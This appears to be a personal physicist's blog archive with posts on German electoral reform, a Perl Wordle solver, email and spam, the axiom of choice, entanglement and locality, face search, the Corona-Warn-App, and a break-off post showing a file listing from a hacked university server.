There is now a proposal by the governing social democrat-green-liberal coalition. The main idea is to weaken the FPTP system in the constituencies while maintaining the proportional vote: Winning a constituency no longer guarantees you a seat in parliament. If your party wins more constituencies than its share of total seats according to the proportional votes, those constituency seats where the party's relative majority was the smallest would be allocated to the runner-up (as that candidate's party still has to be allocated seats according to the proportional vote). This breaks FPTP, but keeps the proportional representation as well as the principle of each constituency sending at least one MP, while fixing the total number of seats in parliament to the magic 598.

The conservatives in opposition do not like this idea (having traditionally been the relatively strongest parties and thus tending to win more constituencies). You can calculate how many seats each party would get assuming the last election's votes: All parties would have to give up about 18% of their seats except for the CSU, the Bavarian conservatives, who would lose about 25%, since some fine print I have not explained so far favours parties winning relatively many constituencies directly.

The conservatives also have a proposal. They are willing to give up proportionality in favour of maintaining FPTP and fixing the number of seats to 598: They propose to assign 299 of the seats according to FPTP to constituency winners and only distributing the remaining 299 seats proportionally. So they don't want to include the constituency winners in the proportional calculation.
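
To make the difference between the two proposals concrete, here is a minimal Python sketch with made-up numbers. Everything specific in it is an assumption for illustration only: the parties A to E, their votes and constituency wins are hypothetical, the parliament is shrunk to 20 seats with 10 constituencies, and seats are distributed by a simple largest-remainder rule rather than by the method and fine print of the actual law.

```python
from math import floor

def proportional(votes, seats):
    """Largest-remainder allocation of `seats` according to `votes` (a simplified, assumed rule)."""
    total = sum(votes.values())
    quotas = {p: v * seats / total for p, v in votes.items()}
    alloc = {p: floor(q) for p, q in quotas.items()}
    leftover = seats - sum(alloc.values())
    # Hand the remaining seats to the parties with the largest fractional parts.
    for p in sorted(quotas, key=lambda p: quotas[p] - alloc[p], reverse=True)[:leftover]:
        alloc[p] += 1
    return alloc

def coalition_proposal(votes, won, seats):
    """All seats are split proportionally; constituency wins beyond a party's share get no seat."""
    share = proportional(votes, seats)
    dropped = {p: max(0, won.get(p, 0) - share[p]) for p in votes}
    return share, dropped

def conservative_proposal(votes, won, seats):
    """Constituency winners keep their seats; only the remaining seats are split proportionally."""
    rest = proportional(votes, seats - sum(won.values()))
    return {p: won.get(p, 0) + rest[p] for p in votes}

# Hypothetical toy data: 20 seats, 10 of them constituencies.
votes = {"A": 30, "B": 24, "C": 21, "D": 15, "E": 10}
won = {"A": 7, "B": 3}

share, dropped = coalition_proposal(votes, won, 20)
print("proportional seats:", share)
print("constituency winners without a seat:", dropped)
print("half FPTP, half proportional:", conservative_proposal(votes, won, 20))
```

With these toy numbers, party A wins 7 constituencies but is only entitled to 6 seats under the first rule, so one of its constituency winners goes without a seat, while under the second rule A ends up with 10 of the 20 seats on 30% of the votes.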

This is the starting point of the Twitter discussions. Both sides accuse the other of having an undemocratic proposal. One side says a parliament whose majorities do not necessarily (and, with current data, are unlikely to) represent majorities in the population is not democratic, while the other side argues that denying a seat to a candidate who won his/her constituency (even by a small relative majority) is not democratic.

Of course it is a total coincidence that each side is arguing for the system that would be better for them (the governing coalition's proposal hurts everybody almost equally and only the CSU a bit more, while the conservative proposal actually benefits the conservatives quite a bit and in particular hurts the smaller parties that win few constituencies or none at all).

(Ampel being the governing coalition, Union being the conservative parties).

Of course, both proposals are in a mathematical sense "democratic" each in their own logic emphasising different legitimate aspects (accurate proportional representation vs accurate representation of local winners).

Beyond the understandable preference for a system that favours one's own political side, I think a more honest discussion would be about which of these legitimate aspects is actually more relevant for the political discourse. If a lot of debates were along geographic lines, north against south, east against west or even rural vs urban, then yes, it would be very important that the local entities are as accurately represented as possible to get the outcomes of these debates right. That would emphasise FPTP as making sure local communities are most honestly represented.

If however typical debates are along other fault lines, for example progressive vs conservative or pro business vs pro social wealth redistribution then we should make sure the views of the population are optimally represented. And that would be in favour of a strict proportional representation.

Guess what I think is actually the case.

All that comes in addition to a political tradition in which "calling your local MP or representative" is a much less common thing than in Anglo-Saxon countries, and to studies showing that even shortly after a general election less than a quarter of the voters are able to name at least two of their constituency's candidates. This casts serious doubts on an informed decision at the local level rather than along party lines (where parties are only needed to make sure there is only one candidate per party in the FPTP system while being the central entity for proportional votes).

PS: The governing coalition's proposal has some ambiguities as well (as I demonstrate here --- in German).

You got me wordle!

2022-01-17T18:41:00.001+01:00

For a few days now, I have been following the hype and playing Wordle. I think I got lucky the first days, but I had already put in some strategy, as in starting with words where the possible results are most telling. I was thinking that getting the vowels right early is a good idea, so I tend to start with "HOUSE" (containing three vowels and an S), possibly followed by "FAINT" (containing the remaining vowels plus the important N and T).

With this start it never took me more than four guesses so far and twice I managed to find the solution in three guesses.

Of course, over time you start thinking how to optimise this. I knew that Donald Knuth had written a paper solving the original Mastermind showing that five moves are sufficient to always find the answer. So today, I sat down and wrote a perl script to help. It does not do the full minimax (but that shouldn't be too hard from where I am) but at least tells you which of your possible next guesses leaves the best worst case in terms of number of remaining words after knowing the result of your guess.

In that metric, it turns out "ARISE" is the optimal first guess (leaving at most 168 out of the possible 2314 words on this list after knowing the result). In any case, here is the source:

NB: Since I started playing, there has been no word that contained the same letter more than once, so I am not 100% sure how those cases are handled: What color do the two 'E's in "AGREE" receive if the solution is "AISLE" (in Mastermind logic, the second would be green and the other grey, not yellow), and what if the solution were "EARLY"? So my script probably does not handle those cases correctly (for EARLY it would color both yellow).

#!/usr/local/bin/perl -w

use strict;

# Load the word list of possible answers
my @words = ();
open (IN, "answers.txt") || die "Cannot open answers: $!\n";
while(<IN>) {
  chomp;
  push @words, uc($_);
}
close IN;

my %letters = ();
my @appears = ();

# Positions at which letter $l can still appear
foreach my $c (0..25)  {
  my $l = chr(65 + $c);
  $letters{$l} = [1,1,1,1,1];
}


# Running without an initial guess shows that ARISE is the best guess as it leaves 168 words.

&filter("ARISE", &bewerten("ARISE", "SOLAR"));
#&filter("SMART", &bewerten("SMART", "SOLAR"));

# Find the remaining words
my @remain = @words;
# Only keep words containing the letters in @appears
foreach my $a(@appears) {
  @remain = grep {/$a/} @remain;
}
my $re = &makeregex;

# Apply positional constraints
@remain = grep {/$re/} @remain;


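# Start above any possible worst case so that a best guess is reported even if only one word remains
my $min = @remain + 1;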
my $best = '';

# Loop over all possible guesses and targets and count how often a potential result appears for a guess
foreach my $g(@remain) {
  my %results = ();
  foreach my $t(@remain) {
    ++$results{&bewerten($g, $t)}
  }
  my $max = 0;
  foreach my $res(keys %results) {
    $max = $results{$res} if $results{$res} > $max;
  }
  #print "$g leaves at most $max.\n";
  if ($min > $max) {
    $min = $max;
    $best = $g;
  }
}

print "Best guess: $best leaves at most $min.\n";

# Assemble a regex for the positional information
sub makeregex {
  my $rem = '';
  foreach my $p (0..4) {
    $rem .= '[';
    foreach my $l (sort keys %letters) {
      $rem .= $l if $letters{$l}->[$p];
    }
    $rem .= ']';
  }
  return $rem;
}

# Find new constraints arising from the result of a guess
sub filter {
  my ($guess, $result) = @_;

  my @a = split //, $result;
  my @w = split //, uc($guess);
  foreach my $p (0..4) {
    my $l = $w[$p];
    if ($a[$p] == 0) {
      $letters{$l} = [0,0,0,0,0];
    } elsif ($a[$p] == 1) {
      &setletter($l, $p, 0);
      push @appears, $l;
    } else {
      foreach my $o (sort keys %letters) {
        &setletter($o, $p, 0);
      }
      &setletter($l, $p, 1);
    }
  }
}

# Update the positional information for letter $l at position $p with value $v
sub setletter {
  my ($l, $p, $v) = @_;
  my @a = @{$letters{$l}};
  $a[$p] = $v;
  $letters{$l} = \@a;
}

# Find the result for $guess given the $target
sub bewerten {
  my ($guess, $target) = @_;
  my @g = split //, $guess;
  my @t = split //, $target;

  my @result = (0,0,0,0,0);
  foreach my $p(0..4) {
    if($g[$p] eq $t[$p]) {
      $result[$p] = 2;
      $t[$p] = '';
      $g[$p] = 'x';
    }
  }
  $target = join('', @t);
  foreach my $p(0..4) {
    if($target =~ /$g[$p]/) {
      $result[$p] = 1;
    }
  }
  return join('', @result);
}
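
For the repeated-letter cases from the NB above, here is a minimal Python sketch of a scoring function that counts letters, together with the worst-case metric used by the script. It assumes the rule that each letter of the solution can justify at most one coloured tile (greens first, then yellows from left to right). That is my understanding of how the game behaves, but it is not checked against the game itself, and the function names are made up for this illustration.

```python
from collections import Counter

def score(guess, target):
    """Return one digit per position: 0 (grey), 1 (yellow), 2 (green)."""
    result = [0] * len(guess)
    # Target letters that are not matched exactly remain available for yellows.
    unmatched = Counter()
    for i, (g, t) in enumerate(zip(guess, target)):
        if g == t:
            result[i] = 2
        else:
            unmatched[t] += 1
    # Each unmatched target letter can turn at most one guess letter yellow.
    for i, g in enumerate(guess):
        if result[i] == 0 and unmatched[g] > 0:
            result[i] = 1
            unmatched[g] -= 1
    return "".join(map(str, result))

def worst_case(guess, candidates):
    """Size of the largest group of candidates sharing the same result for `guess`."""
    return max(Counter(score(guess, t) for t in candidates).values())

print(score("AGREE", "AISLE"))  # 20002: only the final E is green
print(score("AGREE", "EARLY"))  # 10210: the first E is yellow, the second stays grey
```

Under this assumed rule, a grey tile for a letter no longer means the letter is absent from the solution, so the constraint bookkeeping in `filter` would also have to count letters rather than just switch them off.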

Email is broken --- the spammers won

2021-07-23T15:02:00.000+02:00

I am an old man. I am convinced email is a superior medium for person-to-person information exchange. It is text based, so you don't need special hardware to use it, it can still transport various media formats, and it is interoperable: you are not tied to one company offering a service, but thanks to a long list of RFCs starting with number 822 everybody can run their own service. Via GPG or S/MIME you can even add somewhat decent encryption and authentication (at least for the body of the message), even though that is not optimal since historically it came later.

But the real advantage is on the client side: You have threading, you have the option to have folders to store your emails, you can search through them, you can set up filters so routine stuff does not clog up your inbox. And when things go really pear shaped (as they tend to do every few years), you can still recover your data from a text file on your hard drive.

This is all opposed to the continuous Now of messengers where already yesterday's message has scrolled up never to be seen again. But the young folks tend to prefer those and I cannot see any reason those would be preferable (except maybe that you get notifications on your phone). But up to now, it was still an option to say to our students "if you want to get all relevant information, check your email, it will be there".

But today, I think, this is finally over. The spammers won.

Over the last months of the pandemic, I already had to realise that mailing lists are harder and harder to use. As far as I can tell, nobody offers decent mailing lists on the net (at least without too much cost and with reasonable data protection ambitions), probably because those would immediately be used by spammers. So you have to run your own. For the families of our kids' classes at school and for daycare, to spread information that could no longer be posted on physical notice boards, I tried to set up lists on mailman, like we used to do, on one of my hosted servers. Oh, what a pain. There are so many hoops you have to jump through so that the messages actually end up in people's inboxes. For some major email providers (I am looking at you, hosteurope) there is little chance unless, for example, the message's sender is in the recipient's address book. And yes, I have set up my server correctly, with reverse DNS etc working.

But now, it's application season again. We have received over 250 applications for the TMP master program and now I have to inform applicants about their results. The boundary conditions are that I want to send an individual mail to everybody that contains their name, and I want to digitally sign it so applicants know it is authentic and not sent by some prankster impersonating me (that has happened in the past, seriously). And I don't want to send those manually.

So I have a perl script (did I mention I am old), that reads the applicants' data from a database, composes the message with the appropriate template, applies a GPG signature and sends it off to the next SMTP server.

In the past, I had already learned that inside the university network, you have to sleep 10 seconds after each message as every computer that sends emails at a higher rate is considered taken over by some spammers and automatically disconnected from the network for 30 minutes.

This year, I am sending from the home office and as it turns out, some of my messages never make it to the recipients. There is of course no error message to me (thanks spammers) but the message seems to be silently dropped. It's not in the inbox and also cannot be found in the spam folder. Just gone.

I will send paper letters as well (those are required for legal reasons anyway) with a similar script, which is easy thanks to TeX being text based on the input side. But is this really the answer for 2021? How am I supposed to inform people I have not (yet) met from around the world in a reliable way?

I am lost.

On Choice

2021-06-25T11:26:00.002+02:00

This is a follow-up to a Twitter discussion with John Baez that did not fit into the 280 character limit. And before starting, I should warn you that I have never studied set theory in any seriousness and everything I am about to write here is only based on hearsay and is probably wrong.

I am currently teaching "Mathematical Statistical Physics" once more, a large part of which is explaining the operator algebraic approach to quantum statistical physics, KMS states and all that. Part of this is that I cover states as continuous linear functionals on the observables (positive and normalised), and in the example of B(H), the bounded linear operators on a Hilbert space H, I mention that trace class operators $$\rho\in {\cal S}^1({\cal H})$$ give rise to those via $$\omega(a) = \mathrm{tr}(\rho a).$$

And "pretty much all" states arise in this way, meaning that the bounded operators are the (topological) dual of the trace class operators but, for infinite dimensional H, not the other way around, as the bi-dual is larger. There are bounded linear functionals on B(H) that don't come from trace class operators. But (without too much effort), I have never seen one of those extra states being "presented". I have very low standards here for "presented", meaning that I suspect you need to invoke the axiom of choice to produce them (and this is also what John said), and for class this would be sufficient. We invoke choice in other places as well, like (via Hahn-Banach) every C*-algebra having faithful representations (or realising it as a closed subalgebra of some huge B(H)).

So much for background. I wanted to tell you about my attitude towards choice. When I was a student, I never had any doubt about it. Sure, every vector space has a basis, there are sets that are not Lebesgue measurable. A little abstract, but who cares. It was a blog post by Terence Tao that made me reconsider that (turns out, I cannot find that post anymore, bummer). It goes like this: On one of these islands, there is this prison where it is announced to the prisoners that the following morning, they will all be placed in a row and everybody will be given a hat that is either black or white. No prisoner can see his own hat, but he can see all of those in front of him. Starting from the back of the row, each can guess his color (and all other prisoners hear the guess). Those who guess right go free while those who guess wrong get executed. How many can go free?

Think about it.

The answer is: All but one half. The last one says white if he sees an even number of white hats in front of him. Then all the others can deduce their color from this parity plus the answers of the other prisoners behind them. So all but the last prisoner get out and the last has a 50% chance.
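
The parity strategy is easy to check by simulation. Here is a minimal Python sketch; the function name `play` and the convention that `True` means white and index 0 is the last prisoner in the row are my choices for this illustration.

```python
import random

def play(hats):
    """hats[0] belongs to the last prisoner, who sees hats[1:]; True means white.
    Returns the guesses in the order they are announced (back of the row first)."""
    guesses = []
    for i in range(len(hats)):
        seen = sum(hats[i + 1:])  # white hats in front of prisoner i
        if i == 0:
            # The last prisoner announces the parity he sees: "white" for an even count.
            guesses.append(seen % 2 == 0)
        else:
            announced = 0 if guesses[0] else 1  # parity of the white hats among hats[1:]
            heard = sum(guesses[1:i])           # white hats already announced behind him
            # His own hat is white exactly if it is needed to make up the announced parity.
            guesses.append((announced - heard - seen) % 2 == 1)
    return guesses

random.seed(2021)
hats = [random.random() < 0.5 for _ in range(20)]
guesses = play(hats)
print(sum(g != h for g, h in zip(guesses, hats)), "wrong guess(es)")
```

Every prisoner except possibly the first speaker is right, whatever the distribution of hats.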

But that was too easy. Now, this is a really big prison and there are countably infinitely many prisoners. How many go free? When they are placed in a row, the row extends to infinity only in one direction and they are looking in this infinite direction. The last prisoner sees all the other prisoners.

Think about it.

In this case, the answer is: Almost all, all but finitely many. On the set of all infinite sequences of black/white, form equivalence classes where two sequences are equivalent if they differ in at most finitely many places; you could say they are asymptotically equal. Out of each of these equivalence classes, the axiom of choice allows us to pick one representative. The prisoners memorise these representatives (there are only continuum many, they have big brains). The next morning in the court of the prison, all prisoners can see almost all other prisoners, so they know which equivalence class of sequences was chosen by the prison's director. Now, every prisoner announces the color of the memorised representative at his position, and by construction, only finitely many are wrong.

This argument has raised some doubts in me whether I really want choice to be true. I came to terms with it and would describe my position as agnostic. I mainly try to avoid it and rather not rely too much on constructions that invoke it. And for my physics applications this is usually fine.

But it can also be useful in everyday life: My favourite example of it is in the context of distributions. Those are, as you know, continuous linear functionals on test functions. The topology on the test functions, however, is a bit inconvenient, as you have to check that all (infinitely many) partial derivatives converge. So you might try to do the opposite thing: Let's study a linear functional on test functions that is not continuous. Turns out, those are harder to get hold of than you might think: You might think this is like linear operators where continuity is equivalent to boundedness. But this case is different: You need to invoke choice to find one. But this is good, since this implies that every concrete linear functional that you can construct (write down explicitly) is automatically continuous, you don't have to prove anything!

This type of argument is a little dangerous: You really need more than "the usual way to get one is to invoke choice". You really need that it is equivalent to choice. And choice says that for every collection of sets, the Cartesian product is non-empty. It is the "every" that is important. The collection that consists of copies of the set {apple} trivially has an element in the Cartesian product, it is (apple, apple, apple, ...). And this element is concrete, I just constructed it for you.

This caveat is a bit reminiscent of a false argument that you can read far too often: You show that some class of problems is NP-complete (recent incarnations: deciding if an isolated string theory vacuum has a small cosmological constant, deciding if a spin-chain model is gapped, determining the phase structure of some spin chain model, ...) and then argue that these problems are "hard to solve". But this does not imply that a concrete problem in this class is difficult. It is only that solving all problems in this class of problems is difficult. Every single instance of practical relevance could be easy (for example because you had additional information that trivialises the problem). It could well be that you are only interested in spin chain Hamiltonians of some specific form and that you can find a proof that all of them are gapped (or not gapped for that matter). It only means that your original class of problems was too big, it contained too many problems that don't have relevance in your case. This could for example well be the case for the string theory vacua: In the paper I have in mind, that was modelled (of course actually fixing all moduli and computing the value of the potential in all vacua cannot be done with today's technology) by saying there are N moduli fields and each can have at least two values with different values of its potential (positive or negative) and we assume you simply have to add all those values. Is there one choice of the values of all moduli fields such that the sum of the energies is epsilon-close to 0? This turns out to be equivalent to the knapsack problem, which is known to be NP-complete. But for this you need to allow for all possible values of the potential for the individual moduli. If, for example, you knew the values for all moduli are the same, that particular incarnation of the problem is trivial.
So just knowing that the concrete problem you are interested in is a member of a class of problems that is NP-complete does not make that concrete problem hard by itself.
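
As an illustration, here is a minimal Python sketch of this toy model. It is my own paraphrase of the setup described above, not code from the paper, and the function names and numbers are made up. The general search tries all combinations, while the special case in which every modulus has the same two possible values only needs to count how many moduli take the first value.

```python
from itertools import product

def brute_force(options, eps):
    """General case: options[i] lists the possible potential values of modulus i.
    Tries all combinations, so the work grows exponentially with the number of moduli."""
    for choice in product(*options):
        if abs(sum(choice)) <= eps:
            return choice
    return None

def all_equal(a, b, n, eps):
    """Special case: each of the n moduli contributes either a or b.
    Only the number k of moduli taking the value a matters, so n + 1 checks suffice."""
    for k in range(n + 1):
        if abs(k * a + (n - k) * b) <= eps:
            return k
    return None

print(brute_force([(3, -5), (2, -1), (4, -2)], 0.5))  # (3, -1, -2)
print(all_equal(2, -3, 5, 0.5))                       # 3, since 3*2 + 2*(-3) = 0
```

Both functions answer a question from the same class of problems, but the second one is fast for any number of moduli because of the additional information about the instance.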

What is your attitude towards choice? When is the argument "Here is a concrete, constructed example of a thing x. I am interested in some property P of it. To show there are y that don't have property P, I need to invoke choice. Does this prove x has property P?" to be believed?

Locality Confusion or: What Entanglement Can and Cannot Do For You

2020-07-10T11:04:00.002+02:00

I really enjoyed last week's Zoom edition of the annual Strings conference. Clifford has said many of the things about it that I support wholeheartedly, so I don't have to repeat them here. One of the things I really liked was the active participation in the chat channel that accompanied the talks.

But some of the things I read there gave me the impression that there is some confusion out there about locality and things that can happen in quantum theories, which showed up in discussions related to black hole information loss (or the lack thereof). So I thought, maybe it's a good idea to sort these out.

Let's start with some basic quantum information: Entanglement is strange, it allows you to do things that maybe at first you did not expect. You can already see this in the easy, finite dimensional situation. Assume our Hilbert space is a tensor product
\[H=H_h\otimes H_t\]
of stuff here and stuff there. Further, for simplicity, assume both factors have dimension d and we can pick a basis
\[(e_\alpha)_{1\le \alpha\le d}\]

for both. If we have a maximally entangled state like
\[\Omega = \frac 1{\sqrt d} \sum_\alpha e_\alpha\otimes e_\alpha\]
the first observation is that instead of acting with an operator A here, you can as well act with the transposed (with respect to our basis) operator there, as you can see when writing out what it means in components:
\[(A\otimes id)\Omega = (id\otimes A^T)\Omega = \frac 1{\sqrt d}\sum_{\alpha\beta} a_{\alpha\beta} e_\beta\otimes e_\alpha.\]
That is, with the entangled state, everything I can do here creates a state that can also be gotten by doing stuff there. And the converse is true as well: Take any state $\psi \in H$. Then I can find an operator $A$ that acts only here that creates this state from the entangled state:
\[ \psi = (A\otimes id)\Omega.\]
How can we find $A$? First use Schmidt decomposition to write
\[\psi = \sum_j c_j f_j\otimes\tilde f_j\]
where the $c$'s are non-negative numbers and both the $f$'s and the $\tilde f$'s are an ortho-normal basis. Define $V$ to be the unitary matrix that does the change of basis from the $e$'s to the $f$'s (strictly speaking, from the basis here that $\Omega$ pairs with the $\tilde f$'s there, which is the $e$'s themselves if $\tilde f_j = e_j$). Then
\[ A = \sqrt{d\rho_h}V\]
where we used the density matrix $\rho_h$ that is obtained from $\psi$ as a partial trace over the Hilbert space there (i.e. the state that we see here):
\[\rho_h = tr_{H_t}|\psi\rangle\langle \psi| = \sum_j c_j^2 |f_j\rangle\langle f_j|.\]
It's a simple calculation that shows that this $A$ does the job.
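
For completeness, here is a sketch of that calculation, under one convention that is my assumption about what is meant: write $\tilde f_j = \sum_\alpha u_{\alpha j} e_\alpha$ with a unitary matrix $u$, set $g_j = \sum_\alpha \bar u_{\alpha j} e_\alpha$ and take $V$ to map $g_j$ to $f_j$ (if $\tilde f_j = e_j$ this is just $g_j = e_j$). Unitarity of $u$ then gives
\[\Omega = \frac 1{\sqrt d}\sum_\alpha e_\alpha\otimes e_\alpha = \frac 1{\sqrt d}\sum_j g_j\otimes \tilde f_j,\]
and since the partial trace of $|\psi\rangle\langle\psi|$ over the Hilbert space there has eigenvalue $c_j^2$ on $f_j$, so that $\sqrt{\rho_h} f_j = c_j f_j$, we find
\[(A\otimes id)\Omega = \frac 1{\sqrt d}\sum_j \sqrt{d\rho_h}\,V g_j\otimes \tilde f_j = \sum_j \sqrt{\rho_h}\, f_j\otimes \tilde f_j = \sum_j c_j f_j\otimes \tilde f_j = \psi.\]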

In other words, you can create any state of the combined here-there system from an entangled state just by acting locally here.

But what is important is that, since operators here and there still commute,
\[ [A\otimes id, id\otimes B] =0 \]
you cannot influence measurements there by acting here. If you only measure there you cannot tell if the global state is still $\Omega$ or if I decided to act here with a non-trivial unitary operator (which would be the time evolution for my local Hamiltonian $A$).
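
In formulas (a short sketch, where $U$ for the unitary acting here and $B$ for an observable there are my notation): every expectation value that can be measured there is unchanged, because
\[\langle (U\otimes id)\Omega, (id\otimes B)(U\otimes id)\Omega\rangle = \langle \Omega, (U^*U\otimes B)\Omega\rangle = \langle\Omega, (id\otimes B)\Omega\rangle.\]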

It is easy to see that you don't really need a maximally entangled state $\Omega$ to start with, you just need enough entanglement such that $\rho_h$ is invertible (i.e. that there are no 0 coefficients in the Schmidt decomposition of the state you start with).

And from this we can leave the finite dimensional realm and go to QFT, where you have the Reeh-Schlieder theorem, which tells you essentially that the quantum vacuum of a QFT has this entanglement property: In that setting, here corresponds to any local neighbourhood (some causal diamond for example) while there is everything space-like localised from here (for a nice introduction see Witten's lecture notes on quantum information).

But still, this does not mean that by acting locally here in your room you can suddenly make some particle appear on the moon that somebody there could measure (or not). QFT is still local, operators with space-like separation cannot influence each other. The observer on the moon cannot tell if the particle observed there is just a vacuum fluctuation or if you created it in your armchair, even though RS holds and you can create a state with a particle on the moon. If you don't believe it, go back to the finite dimensional explicit example above. RS is really the same thing pimped to infinite dimensions.

And there is another thing that complicates these matters (and which I learned only recently): Localization in gauge theories is more complicated than you might think at first: Take QED. Thanks to Gauß' law, you can write an expression for the total charge $Q$ as an integral of the field-strength over a sphere at infinity. This seems to suggest that $Q$ has to commute with every operator localised in a finite region, as $Q$ is localised in a region space-like to your finite region. But what if that localised operator is a field operator, for example the electron field $\psi(x)$? Does this mean $[Q, \psi(x)]=0$? Of course not, since the electron is charged, it should have
\[ [Q,\psi(x)] = e \psi(x).\]
But does that mean that an observer at spatial infinity can know if I apply $\psi(x)$ right here right now? That would be acausal, I could use this to send messages faster than light.

How is this paradox resolved? You have to be careful about the gauge freedom. You can either say that a gauge fixing term you add in the process of quantisation destroys Gauß' law. Alternatively, you can see that acting with a naked $\psi(x)$ destroys the gauge you have chosen. You can repair this but the consequence is that the "dressed" operator is no longer localised at $x$ but in fact is smeared all over the place (as you have to repair the gauge everywhere). More details can be found in Wojciech Dybalski's lecture notes in the very end (who explained this solution to me).

The same holds true for arguments where you say that the total (ADM) mass/energy in a space time can be measured at spatial infinity.

So the upshot is: Even though quantum theory is weird, you still have to be careful with locality and causality and when arguing about what you can do here and what that means for the rest of the universe. This also holds true when you try to resolve the black hole information loss paradox. Did I say islands?

PimEyes knows what you did last summer

2020-07-10T09:16:00.002+02:00

You might have come across news about a search engine for faces: https://pimeyes.com/en/ . You can upload your photo and it will tell you where in the interwebs it has seen you before. Of course, I had to try it. Here are my results:

OK, that was to be expected. This is the image I use whenever somebody asks me for a short bio with a picture or which I often use as avatar. This is also the first hit when you search for my name on Google Images. This is fine with me, this image is probably my public persona when it comes to the information super-highway. But still, if you meet me on the street, you can use PimEyes to figure out who I am. But that was to be expected. Then there come some variants of this picture and an older one that I used for similar purposes.

Next come pictures like these:

There seems to be an Armenian politician with some vague resemblance, and the internet has a lot of pictures of him. Fine. I can hide behind him (pretty much like my wife, whose name is so common in Germany that the mother of one of our daughter's classmates has the same one when you only consider first and maiden name, as does a former federal minister).

But then there is this:

And yes, that's me. This is some open air concert one or two years ago. And it's not even full frontal like the sample I uploaded. And there are probably 50 other people who are as recognisable as myself in that picture. And even though this search engine seems not to know about them right now, there must be hundreds of pictures of similar Ali Mitgutsch Wimmelbuch quality that show which mass activities I participated in. I have to admit, I am a little bit scared.

Install the Corona-Warn-App even though nobody says it is secure --- or a lesson in public communication

2020-06-16T12:39:00.001+02:00

As of today it exists, the Corona-Warn-App, and you can (and should, see below) download and install it.

That is the short message. It would also have fit into a tweet. Why another blog post? The reason is that many concerns about this app are circulating while, on the other hand, nobody (in particular not the CCC) says "All nonsense, the app is secure!". I would like to explain this situation a bit.

It starts with a mantra that has been recited for years: "Security (as opposed to safety) is not a state but a process". Any software whose complexity goes significantly beyond

10 PRINT "HALLO"

20 GOTO 10

will have bugs. I like to quote an old IBM study which says that in practice one does not manage to have fewer than 1 bug per roughly 10,000 lines of code, because if you keep trying to debug and test the code, you introduce more errors than you eliminate. Even NASA, which makes a great effort here, regularly has space probes hit planetary surfaces hard because of software errors. And certainly not because they were careless.

So the goal can only be to produce as few errors as possible (with appropriate tests, audits, software tools that help you, etc). But nobody who knows what they are doing will be able to guarantee that everything has been found. You can only document that you made an effort and acted according to best practices. And above all: If an error does turn up, you need the corresponding error culture and have to fix it quickly and effectively. Unfortunately, it doesn't get better than that. The only alternative is not to use computers or software at all.

And because people who know what they are talking about are aware of exactly this, they do not let themselves be tempted into saying publicly "I have checked the app, it is secure".

What you can very well establish, however, is that something is insecure once you have found a hole. And this is done regularly, and the CCC does not hold back from talking publicly about problems once they have been found (observing responsible disclosure), as for example in the recent past with the telematics network in the health care system.

What you should very well hear is that, at least so far, you do not hear exactly this about the Corona-Warn-App. There are indeed the 10 touchstones for such an app, and at the beginning it did not look as if they would be met (e.g. central server structure, closed source), but on this front nobody is complaining at the moment. Rather, there is a lot of praise that criticism was responded to: The contact data is only stored locally on the phones (also because Apple and Google recognised this as sensible and there would not really have been an app against the wishes of the respective operating system vendors, if only because, for security reasons, the operating systems do not simply allow apps to use Bluetooth permanently and in the background), and the source code together with its development history was made available on GitHub for public scrutiny. And the public did indeed find problems. But these were not ignored but fixed.

Und genau das ist der Prozess, von dem ich oben sprach. Den darf man auch gerne mal loben und sagen "so soll's sein, gerne wieder". Und das wird ja auch getan. Man muss dem eben nur zuhören und verstehen (was leider nicht so richtig kommuniziert wird), dass dieses Lob eigentlich die bessere Variante des "Zertifikat: die App ist sicher" ist. Hier ist leider das Schweigen nicht laut genug, das "nicht geschimpft ist genug gelobt" ist leider nicht sehr öffentlichkeitswirksam, bzw bedarf einer Erklärung, wie ich sie hier versuche. Update: Linus Neumann, CCC Sprecher, macht es doch.

"Aber es gibt doch Kritikpunkte" höre ich Euch sagen. Ja, die gibt es. Aber schauen wir sie uns an, ob die von ihnen ausgehende Gefahr den möglichen Nutzen der App übersteigen kann:

"People can be tracked." Yes, they can. But only if you blanket the republic with Bluetooth receivers. Pavel Meyer has made this argument in more detail.
"I have to turn on Bluetooth, and that has had vulnerabilities in the past." True. But the same holds for Wi-Fi/internet. If you worry about that, I recommend getting rid of the phone. Update: On Android smartphones that cannot be patched against known problems (Android update after 1 February 2020), turning on Bluetooth may not be a good idea after all. One can ponder, though, whether this is a problem of the app or of the smartphone.
"The app is open source, but what about the library from Apple/Google?" Also true. But the same holds for the phone's operating system. If Apple/Google want to surveil you and carry off your data, they have been able to do so not just since the app, but ever since you started using a phone. So again, better: phone into the shredder.
"If not many people use the app, it is useless" (or in the version "the app is not mandatory, so it cannot work, so I won't use it"). Yes. Chicken and egg. So use it. This is again an instance of the prisoner's dilemma, which you can change by cooperating yourself and hoping that the others come to the same conclusion.

That leaves a meta question: I would actually like to book this whole story as a success story of the CCC as well, since (assuming it really did have an influence) real improvements were achieved. Especially when you recall what was proposed at the beginning of the story, such as GPS tracking, a central, state-run contact database, etc. The fact that expertise is being listened to here is also a long-term success: the club has managed over the years to establish itself as a competent and critical observer. The public has been sensitized to such topics.

On the other hand, I read a lot of criticism of the app on social media, and explanations of why it is evil or why people would under no circumstances install it themselves. I have just listed the halfway rational objections (even though my cost-benefit assessment is clearly different and I installed the app first thing this morning), but there is also an endless amount that lies on the spectrum from half-knowledge to tinfoil-hattery. Many concerns are voiced that come from the gut (the state wants to surveil us Stasi-style) but that, from a technical point of view and as far as anyone knows, do not hold up. And somehow I fear that many of these people were also socialized into their critical view by the CCC and company, and at some point took a wrong turn.

And that is a drop of bitterness, or rather a task for the future: how do you manage, especially in your communication, to separate even more clearly the justified concerns from the unjustified ones (which sound so similar)? How can you communicate your view more assertively without having to lapse into a "We promise you, everything is secure"? This text, at any rate, is an attempt in that direction.

And the necessary disclaimer: I am a member of the CCC (both in Munich and, as a silent member, in the federal CCC). But I do not speak for the club. This is only my opinion (which, in my view, everyone should of course share, including all clubs of the world. Haha)

High Performance Hackers

2020-05-16T13:23:00.001+02:00

In the last few days, there was news that several big academic high performance computing centers had been hacked. Here in Munich, the LRZ (Leibniz Rechenzentrum) was affected, but apparently so were computers at the LMU faculty of physics (there are a few clusters in the institute's basement). Word was that it was Linux systems that had been compromised and that the attackers had left files in /etc/fonts.

I could not resist looking for these files as well, and indeed found them on one of the servers:

helling@hostname:~$ cd /etc/fonts/
helling@hostname:/etc/fonts$ ls -la
total 52
drwxr-xr-x   4 root root  4096 Apr  5  2018 .
drwxr-xr-x 140 root root 12288 May 14 10:07 ..
drwxr-xr-x   2 root root  4096 Aug 29  2019 conf.avail
drwxr-xr-x   2 root root  4096 Aug 29  2019 conf.d
-rwsr-sr-x   1 root root  6256 Apr  5  2018 .fonts
